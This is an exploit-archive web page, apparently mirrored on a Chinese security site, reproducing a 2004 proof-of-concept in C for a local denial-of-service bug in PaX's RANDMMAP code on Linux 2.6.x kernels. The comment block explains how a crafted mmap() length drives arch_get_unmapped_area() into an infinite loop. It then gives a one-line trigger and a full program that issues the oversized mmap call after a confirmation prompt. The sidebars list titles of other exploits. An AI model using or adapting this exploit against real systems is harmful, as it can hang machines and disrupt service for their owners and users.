首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PaX DoS proof-of-concept
来源:www.sabu.net 作者:Shadowinteger 发布时间:2004-05-13  

/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
by Shadowinteger <shadowinteger sentinix org>
2004-05-04

Written after reading the security advisory posted by borg (ChrisR-) on
Bugtraq 2004-05-03 (my time). ChrisR -> www.cr-secure.net

Acknowledgments: sabu (www.sabu.net);


Vulnerability:
PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
(function in mm/mmap.c) is vulnerable to a local Denial of Service attack
because of a bug that puts the kernel into an infinite loop.

Read the security advisory for more info:
http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0


Exploitation:
We need to get passed the following line of code in
arch_get_unmapped_area() to succeed with a DoS:
if (TASK_SIZE - len < addr) { ...

We do it like this:

TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL

DOSVAL is the value we'll use.

arch_get_unmapped_area() does the following:

if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code.
(TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.

A DOSVAL of e.g. 0x80000000 or above will work most times, no real need
for the funky calculation above.

There are quite a few functions available that are "front-ends" to
arch_get_unmapped_area(). This exploit uses good-old mmap().


Tiny DoS PoC:

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);}

*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

#define TASK_SIZE 0xc0000000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x04000000

#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK)

int main() {
int fd = open("/dev/zero", O_RDONLY);

printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n"
"by Shadowinteger <shadowinteger sentinix org> 20040504\n"
"created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n"
"ChrisR -> www.cr-secure.net\;n"
"\n"
"the exploit binary must be marked PF_PAX_RANDMMAP to work!\n"
"\n"
"greetz goes to: sabu (www.sabu.net);\n"
"\n"
"-----------------------------------------------------------------------------
-\n"
"will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n"
"\n"
"if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a
little,\n"
"are you sure you want to continue? [type Y to continue] ", DOSVAL);
fflush(stdout);

if (getchar() != 'Y') {
printf("aborted.\n");
return 0;
}

printf("\n"
"attempting to DoS...\n");

if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {
perror("mmap");
}

printf("your kernel does not seem to be vulnerable! :)\n");

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sasser Worm ftpd Remote Buffer
·Local AIX getlvcb Exploit
·Monit 4.1 Remote Buffer Overru
·Uploading shellcode v0.2 with
·Pound <=1.5 remote format s
·Symantec Multiple Firewall DNS
·Eudora file URL buffer overflo
·Envymask 写的DVBBS UPFILES EXP
·MyWeb 3.3 Buffer Overflow Expl
·BBSXP setup.asp top function i
·sendmail 8.12.9 local root exp
·动网上传漏洞利用工具Gui版(De
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved